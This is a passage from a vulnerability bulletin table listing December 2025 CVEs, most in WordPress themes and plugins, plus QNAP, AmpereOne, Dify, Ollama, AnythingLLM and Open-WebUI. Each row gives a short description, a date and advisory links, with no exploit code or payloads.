| AncoraThemes--Wanderic | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Wanderic wanderic allows PHP Local File Inclusion. This issue affects Wanderic: from n/a through <= 1.0.10. | 2025-12-18 | not yet calculated | CVE-2025-60043 | https://vdp.patchstack.com/database/Wordpress/Theme/wanderic/vulnerability/wordpress-wanderic-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Fribbo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Fribbo fribbo allows PHP Local File Inclusion. This issue affects Fribbo: from n/a through <= 1.1.0. | 2025-12-18 | not yet calculated | CVE-2025-60044 | https://vdp.patchstack.com/database/Wordpress/Theme/fribbo/vulnerability/wordpress-fribbo-theme-1-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| ThemeAtelier--IDonatePro | Missing Authorization vulnerability in ThemeAtelier IDonatePro idonate-pro allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects IDonatePro: from n/a through <= 2.1.11. | 2025-12-18 | not yet calculated | CVE-2025-60045 | https://vdp.patchstack.com/database/Wordpress/Plugin/idonate-pro/vulnerability/wordpress-idonatepro-plugin-2-1-11-broken-access-control-vulnerability?_s_id=cve |
| axiomthemes--HeartStar | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes HeartStar heartstar allows PHP Local File Inclusion. This issue affects HeartStar: from n/a through <= 1.0.14. | 2025-12-18 | not yet calculated | CVE-2025-60046 | https://vdp.patchstack.com/database/Wordpress/Theme/heartstar/vulnerability/wordpress-heartstar-theme-1-0-14-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--IPharm | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes IPharm ipharm allows PHP Local File Inclusion. This issue affects IPharm: from n/a through <= 1.2.3. | 2025-12-18 | not yet calculated | CVE-2025-60047 | https://vdp.patchstack.com/database/Wordpress/Theme/ipharm/vulnerability/wordpress-ipharm-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Tripster | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Tripster tripster allows PHP Local File Inclusion. This issue affects Tripster: from n/a through <= 1.0.10. | 2025-12-18 | not yet calculated | CVE-2025-60048 | https://vdp.patchstack.com/database/Wordpress/Theme/tripster/vulnerability/wordpress-tripster-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Soleil | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Soleil soleil allows PHP Local File Inclusion. This issue affects Soleil: from n/a through <= 1.17. | 2025-12-18 | not yet calculated | CVE-2025-60049 | https://vdp.patchstack.com/database/Wordpress/Theme/soleil/vulnerability/wordpress-soleil-theme-1-17-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Panda | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Panda panda allows PHP Local File Inclusion. This issue affects Panda: from n/a through <= 1.21. | 2025-12-18 | not yet calculated | CVE-2025-60050 | https://vdp.patchstack.com/database/Wordpress/Theme/panda/vulnerability/wordpress-panda-theme-1-21-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Rare Radio | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Rare Radio rareradio allows PHP Local File Inclusion. This issue affects Rare Radio: from n/a through <= 1.0.15.1. | 2025-12-18 | not yet calculated | CVE-2025-60051 | https://vdp.patchstack.com/database/Wordpress/Theme/rareradio/vulnerability/wordpress-rare-radio-theme-1-0-15-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--W&D | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes W&D wd allows PHP Local File Inclusion. This issue affects W&D: from n/a through <= 1.0. | 2025-12-18 | not yet calculated | CVE-2025-60052 | https://vdp.patchstack.com/database/Wordpress/Theme/wd/vulnerability/wordpress-w-d-theme-1-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--MaxCube | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes MaxCube maxcube allows PHP Local File Inclusion. This issue affects MaxCube: from n/a through <= 1.3.1. | 2025-12-18 | not yet calculated | CVE-2025-60053 | https://vdp.patchstack.com/database/Wordpress/Theme/maxcube/vulnerability/wordpress-maxcube-theme-1-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--OnLeash | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes OnLeash onleash allows PHP Local File Inclusion. This issue affects OnLeash: from n/a through <= 1.5.2. | 2025-12-18 | not yet calculated | CVE-2025-60054 | https://vdp.patchstack.com/database/Wordpress/Theme/onleash/vulnerability/wordpress-onleash-theme-1-5-2-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Fabrica | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Fabrica fabrica allows PHP Local File Inclusion. This issue affects Fabrica: from n/a through <= 1.8.1. | 2025-12-18 | not yet calculated | CVE-2025-60055 | https://vdp.patchstack.com/database/Wordpress/Theme/fabrica/vulnerability/wordpress-fabrica-theme-1-8-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Winger | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Winger winger allows PHP Local File Inclusion. This issue affects Winger: from n/a through <= 1.0.16. | 2025-12-18 | not yet calculated | CVE-2025-60056 | https://vdp.patchstack.com/database/Wordpress/Theme/winger/vulnerability/wordpress-winger-theme-1-0-16-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--DJ Rainflow | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes DJ Rainflow dj-rainflow allows PHP Local File Inclusion. This issue affects DJ Rainflow: from n/a through <= 1.3.13. | 2025-12-18 | not yet calculated | CVE-2025-60057 | https://vdp.patchstack.com/database/Wordpress/Theme/dj-rainflow/vulnerability/wordpress-dj-rainflow-theme-1-3-13-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--DetailX | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes DetailX detailx allows PHP Local File Inclusion. This issue affects DetailX: from n/a through <= 1.10.0. | 2025-12-18 | not yet calculated | CVE-2025-60058 | https://vdp.patchstack.com/database/Wordpress/Theme/detailx/vulnerability/wordpress-detailx-theme-1-10-0-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--smart SEO | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes smart SEO smartSEO allows PHP Local File Inclusion. This issue affects smart SEO: from n/a through <= 2.12. | 2025-12-18 | not yet calculated | CVE-2025-60059 | https://vdp.patchstack.com/database/Wordpress/Theme/smartSEO/vulnerability/wordpress-smart-seo-theme-2-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Pubzinne | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Pubzinne pubzinne allows PHP Local File Inclusion. This issue affects Pubzinne: from n/a through <= 1.0.12. | 2025-12-18 | not yet calculated | CVE-2025-60060 | https://vdp.patchstack.com/database/Wordpress/Theme/pubzinne/vulnerability/wordpress-pubzinne-theme-1-0-12-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Kicker | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Kicker kicker allows PHP Local File Inclusion. This issue affects Kicker: from n/a through <= 2.2.0. | 2025-12-18 | not yet calculated | CVE-2025-60061 | https://vdp.patchstack.com/database/Wordpress/Theme/kicker/vulnerability/wordpress-kicker-theme-2-2-0-local-file-inclusion-vulnerability?_s_id=cve |
| mmetrodw--tPlayer | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in mmetrodw tPlayer tplayer-html5-audio-player-with-playlist allows SQL Injection. This issue affects tPlayer: from n/a through <= 1.2.1.6. | 2025-12-18 | not yet calculated | CVE-2025-60062 | https://vdp.patchstack.com/database/Wordpress/Plugin/tplayer-html5-audio-player-with-playlist/vulnerability/wordpress-tplayer-plugin-1-2-1-6-sql-injection-vulnerability?_s_id=cve |
| axiomthemes--Rosalinda | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Rosalinda rosalinda allows PHP Local File Inclusion. This issue affects Rosalinda: from n/a through <= 1.2.3. | 2025-12-18 | not yet calculated | CVE-2025-60063 | https://vdp.patchstack.com/database/Wordpress/Theme/rosalinda/vulnerability/wordpress-rosalinda-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Renewal | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Renewal renewal allows PHP Local File Inclusion.This issue affects Renewal: from n/a through <= 1.2.2. | 2025-12-18 | not yet calculated | CVE-2025-60064 | https://vdp.patchstack.com/database/Wordpress/Theme/renewal/vulnerability/wordpress-renewal-theme-1-2-2-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Pinevale | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Pinevale pinevale allows PHP Local File Inclusion.This issue affects Pinevale: from n/a through <= 1.0.14. | 2025-12-18 | not yet calculated | CVE-2025-60065 | https://vdp.patchstack.com/database/Wordpress/Theme/pinevale/vulnerability/wordpress-pinevale-theme-1-0-14-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Katelyn | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Katelyn katelyn allows PHP Local File Inclusion.This issue affects Katelyn: from n/a through <= 1.0.10. | 2025-12-18 | not yet calculated | CVE-2025-60066 | https://vdp.patchstack.com/database/Wordpress/Theme/katelyn/vulnerability/wordpress-katelyn-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve |
| axiomthemes--Giardino | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Giardino giardino allows PHP Local File Inclusion.This issue affects Giardino: from n/a through <= 1.1.10. | 2025-12-18 | not yet calculated | CVE-2025-60067 | https://vdp.patchstack.com/database/Wordpress/Theme/giardino/vulnerability/wordpress-giardino-theme-1-1-10-local-file-inclusion-vulnerability?_s_id=cve |
| javothemes--Javo Core | Improper Control of Generation of Code ('Code Injection') vulnerability in javothemes Javo Core javo-core allows Code Injection.This issue affects Javo Core: from n/a through <= 3.0.0.266. | 2025-12-18 | not yet calculated | CVE-2025-60068 | https://vdp.patchstack.com/database/Wordpress/Plugin/javo-core/vulnerability/wordpress-javo-core-plugin-3-0-0-266-arbitrary-code-execution-vulnerability?_s_id=cve |
| ThemeMove--MinimogWP | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove MinimogWP minimog allows PHP Local File Inclusion.This issue affects MinimogWP: from n/a through <= 3.9.6. | 2025-12-18 | not yet calculated | CVE-2025-60069 | https://vdp.patchstack.com/database/Wordpress/Theme/minimog/vulnerability/wordpress-minimogwp-theme-3-9-2-local-file-inclusion-vulnerability?_s_id=cve |
| The4--Molla | Improper Control of Generation of Code ('Code Injection') vulnerability in The4 Molla molla allows Code Injection.This issue affects Molla: from n/a through <= 1.5.13. | 2025-12-18 | not yet calculated | CVE-2025-60070 | https://vdp.patchstack.com/database/Wordpress/Theme/molla/vulnerability/wordpress-molla-multipurpose-responsive-shopify-theme-1-5-13-arbitrary-code-execution-vulnerability?_s_id=cve |
| don-themes--Riode | Multi-Purpose WooCommerce | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in don-themes Riode | Multi-Purpose WooCommerce riode allows PHP Local File Inclusion.This issue affects Riode | Multi-Purpose WooCommerce: from n/a through <= 1.6.23. | 2025-12-18 | not yet calculated | CVE-2025-60071 | https://vdp.patchstack.com/database/Wordpress/Theme/riode/vulnerability/wordpress-riode-multi-purpose-woocommerce-theme-1-6-23-local-file-inclusion-vulnerability?_s_id=cve |
| Processby--Anchor smooth scroll | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Processby Anchor smooth scroll anchor-smooth-scroll allows PHP Local File Inclusion.This issue affects Anchor smooth scroll: from n/a through <= 1.0.2. | 2025-12-18 | not yet calculated | CVE-2025-60072 | https://vdp.patchstack.com/database/Wordpress/Plugin/anchor-smooth-scroll/vulnerability/wordpress-anchor-smooth-scroll-plugin-1-0-2-local-file-inclusion-vulnerability?_s_id=cve |
| jbhovik--Ray Enterprise Translation | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jbhovik Ray Enterprise Translation lingotek-translation allows PHP Local File Inclusion.This issue affects Ray Enterprise Translation: from n/a through <= 1.7.1. | 2025-12-18 | not yet calculated | CVE-2025-60076 | https://vdp.patchstack.com/database/Wordpress/Plugin/lingotek-translation/vulnerability/wordpress-ray-enterprise-translation-plugin-1-7-1-local-file-inclusion-vulnerability?_s_id=cve |
| YayCommerce--YayPricing | Missing Authorization vulnerability in YayCommerce YayPricing yaypricing allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects YayPricing: from n/a through <= 3.5.3. | 2025-12-18 | not yet calculated | CVE-2025-60077 | https://vdp.patchstack.com/database/Wordpress/Plugin/yaypricing/vulnerability/wordpress-yaypricing-plugin-3-5-3-broken-access-control-vulnerability?_s_id=cve |
| Agence web Eoxia - Montpellier--Task Manager | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Agence web Eoxia - Montpellier Task Manager task-manager allows PHP Local File Inclusion.This issue affects Task Manager: from n/a through <= 3.0.2. | 2025-12-18 | not yet calculated | CVE-2025-60078 | https://vdp.patchstack.com/database/Wordpress/Plugin/task-manager/vulnerability/wordpress-task-manager-plugin-3-0-2-local-file-inclusion-vulnerability?_s_id=cve |
| bPlugins--Parallax Section block | Missing Authorization vulnerability in bPlugins Parallax Section block parallax-section allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Parallax Section block: from n/a through <= 1.0.9. | 2025-12-18 | not yet calculated | CVE-2025-60079 | https://vdp.patchstack.com/database/Wordpress/Plugin/parallax-section/vulnerability/wordpress-parallax-section-block-plugin-1-0-9-broken-authentication-vulnerability?_s_id=cve |
| add-ons.org--PDF for Gravity Forms + Drag And Drop Template Builder | Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Gravity Forms + Drag And Drop Template Builder pdf-for-gravity-forms allows Object Injection.This issue affects PDF for Gravity Forms + Drag And Drop Template Builder: from n/a through <= 6.3.0. | 2025-12-18 | not yet calculated | CVE-2025-60080 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-gravity-forms/vulnerability/wordpress-pdf-for-gravity-forms-drag-and-drop-template-builder-plugin-6-3-0-php-object-injection-vulnerability?_s_id=cve |
| add-ons.org--PDF for Contact Form 7 | Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Contact Form 7 pdf-for-contact-form-7 allows Object Injection.This issue affects PDF for Contact Form 7: from n/a through <= 6.3.4. | 2025-12-18 | not yet calculated | CVE-2025-60081 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-contact-form-7/vulnerability/wordpress-pdf-for-contact-form-7-plugin-6-3-0-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| add-ons.org--PDF for WPForms | Deserialization of Untrusted Data vulnerability in add-ons.org PDF for WPForms pdf-for-wpforms allows Object Injection.This issue affects PDF for WPForms: from n/a through <= 6.3.1. | 2025-12-18 | not yet calculated | CVE-2025-60082 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-wpforms/vulnerability/wordpress-pdf-for-wpforms-plugin-6-3-0-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| add-ons.org--PDF Invoice Builder for WooCommerce | Deserialization of Untrusted Data vulnerability in add-ons.org PDF Invoice Builder for WooCommerce pdf-for-woocommerce allows Object Injection.This issue affects PDF Invoice Builder for WooCommerce: from n/a through <= 6.3.2. | 2025-12-18 | not yet calculated | CVE-2025-60083 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-woocommerce/vulnerability/wordpress-pdf-invoice-builder-for-woocommerce-plugin-6-3-2-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| add-ons.org--PDF for Elementor Forms + Drag And Drop Template Builder | Deserialization of Untrusted Data vulnerability in add-ons.org PDF for Elementor Forms + Drag And Drop Template Builder pdf-for-elementor-forms allows Object Injection.This issue affects PDF for Elementor Forms + Drag And Drop Template Builder: from n/a through <= 6.3.1. | 2025-12-18 | not yet calculated | CVE-2025-60084 | https://vdp.patchstack.com/database/Wordpress/Plugin/pdf-for-elementor-forms/vulnerability/wordpress-pdf-for-elementor-forms-drag-and-drop-template-builder-plugin-6-3-1-php-object-injection-vulnerability?_s_id=cve |
| Matt--WP Voting Contest | Missing Authorization vulnerability in Matt WP Voting Contest wp-voting-contest allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Voting Contest: from n/a through <= 5.8. | 2025-12-18 | not yet calculated | CVE-2025-60086 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-voting-contest/vulnerability/wordpress-wp-voting-contest-plugin-5-8-broken-access-control-vulnerability?_s_id=cve |
| Saleswonder Team: Tobias--WebinarIgnition | Missing Authorization vulnerability in Saleswonder Team: Tobias WebinarIgnition webinar-ignition allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WebinarIgnition: from n/a through <= 4.06.04. | 2025-12-18 | not yet calculated | CVE-2025-60088 | https://vdp.patchstack.com/database/Wordpress/Plugin/webinar-ignition/vulnerability/wordpress-webinarignition-plugin-4-05-13-broken-access-control-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms FreshDesk Plugin | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms FreshDesk Plugin gf-freshdesk allows Object Injection.This issue affects WP Gravity Forms FreshDesk Plugin: from n/a through <= 1.3.5. | 2025-12-18 | not yet calculated | CVE-2025-60089 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-freshdesk/vulnerability/wordpress-wp-gravity-forms-freshdesk-plugin-plugin-1-3-5-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms Insightly | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Insightly gf-insightly allows Object Injection.This issue affects WP Gravity Forms Insightly: from n/a through <= 1.1.6. | 2025-12-18 | not yet calculated | CVE-2025-60090 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-insightly/vulnerability/wordpress-wp-gravity-forms-insightly-plugin-1-1-5-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms Zoho CRM and Bigin | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Zoho CRM and Bigin gf-zoho allows Object Injection.This issue affects WP Gravity Forms Zoho CRM and Bigin: from n/a through <= 1.2.9. | 2025-12-18 | not yet calculated | CVE-2025-60091 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-zoho/vulnerability/wordpress-wp-gravity-forms-zoho-crm-and-bigin-plugin-1-2-8-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms Constant Contact Plugin | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Constant Contact Plugin gf-constant-contact allows Object Injection.This issue affects WP Gravity Forms Constant Contact Plugin: from n/a through <= 1.1.2. | 2025-12-18 | not yet calculated | CVE-2025-60174 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-constant-contact/vulnerability/wordpress-wp-gravity-forms-constant-contact-plugin-plugin-1-1-2-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms HubSpot | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms HubSpot gf-hubspot allows Object Injection.This issue affects WP Gravity Forms HubSpot: from n/a through <= 1.2.6. | 2025-12-18 | not yet calculated | CVE-2025-60178 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-hubspot/vulnerability/wordpress-wp-gravity-forms-hubspot-plugin-1-2-6-deserialization-of-untrusted-data-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms Salesforce | Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Salesforce gf-salesforce-crmperks allows Object Injection.This issue affects WP Gravity Forms Salesforce: from n/a through <= 1.5.1. | 2025-12-18 | not yet calculated | CVE-2025-60180 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-salesforce-crmperks/vulnerability/wordpress-wp-gravity-forms-salesforce-plugin-1-5-1-php-object-injection-vulnerability?_s_id=cve |
| Schiocco--Support Board | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Schiocco Support Board supportboard allows Reflected XSS.This issue affects Support Board: from n/a through < 3.8.7. | 2025-12-18 | not yet calculated | CVE-2025-60182 | https://vdp.patchstack.com/database/Wordpress/Plugin/supportboard/vulnerability/wordpress-support-board-plugin-3-8-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| iceScrum--iceSrum | A Zip Slip vulnerability in the import a Project component of iceScrum v7.54 Pro On-prem allows attackers to execute arbitrary code via uploading a crafted Zip file. | 2025-12-15 | not yet calculated | CVE-2025-60786 | https://www.icescrum.com/download/ https://zdaylabs.com/CVE-2025-60786.html |
| Johnson Controls--iSTAReX, iSTAR Edge, iSTAR Ultra LT, iSTAR Ultra , iSTAR Ultra SE | Successful exploitation of this vulnerability could result in the product failing to re-establish communication once the certificate expires. | 2025-12-17 | not yet calculated | CVE-2025-61736 | https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-04 |
| Inaba Denki Sangyo Co., Ltd.--CHOCO TEI WATCHER mini (IB-MCT001) | CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper check for unusual or exceptional conditions. If a remote attacker sends a specially crafted request to the Video Download interface, the system may become unresponsive. | 2025-12-16 | not yet calculated | CVE-2025-61976 | https://www.inaba.co.jp/files/chocomini_vulnerability_newly_identified.pdf https://jvn.jp/en/vu/JVNVU92827367/ |
| QNAP Systems Inc.--QTS | An improper neutralization of argument delimiters in a command vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to alter execution logic. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3297 build 20251024 and later; QuTS hero h5.2.7.3297 build 20251024 and later; QuTS hero h5.3.1.3292 build 20251024 and later. | 2025-12-16 | not yet calculated | CVE-2025-62847 | https://www.qnap.com/en/security-advisory/qsa-25-45 |
| QNAP Systems Inc.--QTS | A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to launch a denial-of-service (DoS) attack. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3297 build 20251024 and later; QuTS hero h5.2.7.3297 build 20251024 and later; QuTS hero h5.3.1.3292 build 20251024 and later. | 2025-12-16 | not yet calculated | CVE-2025-62848 | https://www.qnap.com/en/security-advisory/qsa-25-45 |
| QNAP Systems Inc.--QTS | An SQL injection vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to execute unauthorized code or commands. We have already fixed the vulnerability in the following versions: QTS 5.2.7.3297 build 20251024 and later; QuTS hero h5.2.7.3297 build 20251024 and later; QuTS hero h5.3.1.3292 build 20251024 and later. | 2025-12-16 | not yet calculated | CVE-2025-62849 | https://www.qnap.com/en/security-advisory/qsa-25-45 |
| Ampere--AmpereOne | Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM Boot Error Record Table driver that could result in (1) an out-of-bounds read which leaks Secure-EL0 information to a process running in Non-Secure state or (2) an out-of-bounds write which corrupts Secure or Non-Secure memory, limited to memory mapped to UEFI-MM Secure Partition by the Secure Partition Manager. | 2025-12-16 | not yet calculated | CVE-2025-62862 | https://amperecomputing.com/products/product-security https://amperecomputing.com/products/security-bulletins/amp-sb-0007 |
| Ampere--AmpereOne | Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM PCIe driver that could result in an out-of-bounds write within PCIe driver's S-EL0 address space. | 2025-12-16 | not yet calculated | CVE-2025-62863 | https://amperecomputing.com/products/product-security https://amperecomputing.com/products/security-bulletins/amp-sb-0007 |
| Ampere--AmpereOne | Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM MMCommunicate service that could result in an out-of-bounds write within the UEFI-MM Secure Partition context. | 2025-12-16 | not yet calculated | CVE-2025-62864 | https://amperecomputing.com/products/product-security https://amperecomputing.com/products/security-bulletins/amp-sb-0007 |
| CridioStudio--ListingPro | Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ListingPro: from n/a through <= 2.9.9. | 2025-12-18 | not yet calculated | CVE-2025-63039 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-9-broken-access-control-vulnerability-2?_s_id=cve |
| MatrixAddons--Easy Invoice | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MatrixAddons Easy Invoice easy-invoice allows DOM-Based XSS. This issue affects Easy Invoice: from n/a through <= 2.0.9. | 2025-12-18 | not yet calculated | CVE-2025-6324 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-invoice/vulnerability/wordpress-easy-invoice-plugin-2-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AncoraThemes--Inset | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Inset inset allows PHP Local File Inclusion. This issue affects Inset: from n/a through <= 1.18.0. | 2025-12-18 | not yet calculated | CVE-2025-6326 | https://vdp.patchstack.com/database/Wordpress/Theme/inset/vulnerability/wordpress-inset-1-18-0-local-file-inclusion-vulnerability?_s_id=cve |
| Dify--Dify | A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/setup endpoint. The endpoint implements an insecure CORS policy that reflects any Origin header and enables Access-Control-Allow-Credentials: true, permitting arbitrary external domains to make authenticated requests. | 2025-12-18 | not yet calculated | CVE-2025-63386 | https://github.com/langgenius/dify/discussions https://gist.github.com/Cristliu/1610daac87c711ac3e0250c58f5cc4f9 |
| Dify--Dify | Dify v1.9.1 is vulnerable to Insecure Permissions. An unauthenticated attacker can directly send HTTP GET requests to the /console/api/system-features endpoint without any authentication credentials or session tokens. The endpoint fails to implement proper authorization checks, allowing anonymous access to sensitive system configuration data. | 2025-12-18 | not yet calculated | CVE-2025-63387 | https://github.com/langgenius/dify/discussions https://gist.github.com/Cristliu/cddc0cbbf354de51106ab63a11be94af |
| Dify--Dify | A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/system-features endpoint. The endpoint implements an overly permissive CORS policy that reflects arbitrary Origin headers and sets Access-Control-Allow-Credentials: true, allowing any external domain to make authenticated cross-origin requests. | 2025-12-18 | not yet calculated | CVE-2025-63388 | https://github.com/langgenius/dify/discussions https://gist.github.com/Cristliu/5ded6d03e41d7d66ecb1b568bae3ff6c |
| Ollama--Ollama | A critical authentication bypass vulnerability exists in Ollama platform's API endpoints in versions prior to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, enabling remote attackers to perform unauthorized model management operations. | 2025-12-18 | not yet calculated | CVE-2025-63389 | https://github.com/ollama/ollama/issues https://gist.github.com/Cristliu/48dae561696374744d9fced07a544ecd |
| AnythingLLM--AnythingLLM | An authentication bypass vulnerability exists in AnythingLLM v1.8.5 via the /api/workspaces endpoint. The endpoint fails to implement proper authentication checks, allowing unauthenticated remote attackers to enumerate and retrieve detailed information about all configured workspaces. Exposed data includes: workspace identifiers (id, name, slug), AI model configurations (chatProvider, chatModel, agentProvider), system prompts (openAiPrompt), operational parameters (temperature, history length, similarity thresholds), vector search settings, chat modes, and timestamps. | 2025-12-18 | not yet calculated | CVE-2025-63390 | https://github.com/Mintplex-Labs/anything-llm/issues https://gist.github.com/Cristliu/ba529c99abec87102e5ef36435d02a6d |
| Open-WebUI--Open-WebUI | An authentication bypass vulnerability exists in Open-WebUI <=0.6.32 in the /api/config endpoint. The endpoint lacks proper authentication and authorization controls, exposing sensitive system configuration data to unauthenticated remote attackers. | 2025-12-18 | not yet calculated | CVE-2025-63391 | https://github.com/open-webui/open-webui/issues https://gist.github.com/Cristliu/13c41b97285b776275bc8bfd3504e51b |
